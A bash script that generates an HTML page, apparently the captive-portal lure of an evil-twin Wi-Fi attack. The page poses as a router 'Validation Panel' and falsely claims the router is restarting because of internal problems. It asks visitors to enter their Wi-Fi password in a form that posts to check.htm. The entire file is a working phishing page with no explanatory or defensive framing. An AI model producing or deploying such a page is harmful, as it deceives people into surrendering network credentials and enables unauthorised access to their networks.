#!/usr/bin/env bash
echo '<!DOCTYPE html>'
echo '<html>'
echo -e '	<head>'
echo -e '		<meta name="viewport" content="width=device-width"/>'
echo -e '		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>'
echo -e '		<title>Internet Portal</title>'
echo -e '		<link rel="stylesheet" type="text/css" href="portal.css"/>'
echo -e '		<script type="text/javascript" src="portal.js"></script>'
echo -e '	</head>'
echo -e '	<body>'
echo -e '  <nav>'
echo -e '    <b><span>MM</span></b>'
echo -e '    Validation Panel'
echo -e '  </nav>'
echo -e '		<img src="pixel.png" style="display: none;"/>'
echo -e '		<div class="content">'
echo -e '			<form method="post" id="loginform" name="loginform" action="check.htm">'
echo -e ''
echo -e '       <div class="sign-in">Sign in:</div>'
echo -e '				<p class="warning">Due to internal problems, the router is being restarted. Enter password to reconnect to the network.</p>'
echo -e '				<label>'
echo -e '					<input id="password" type="password" name="password" maxlength="63" size="20" placeholder="Enter your Wi-Fi password"/><br/>'
echo -e '				</label>'
echo -e '				<p>Show password <input type="checkbox" id="showpass"/></p>'
echo -e '				<input class="button" id="formbutton" type="button" value="Submit"/>'
echo -e '			</form>'
echo -e '		</div>'
echo -e '	</body>'
echo '</html>'
exit 0
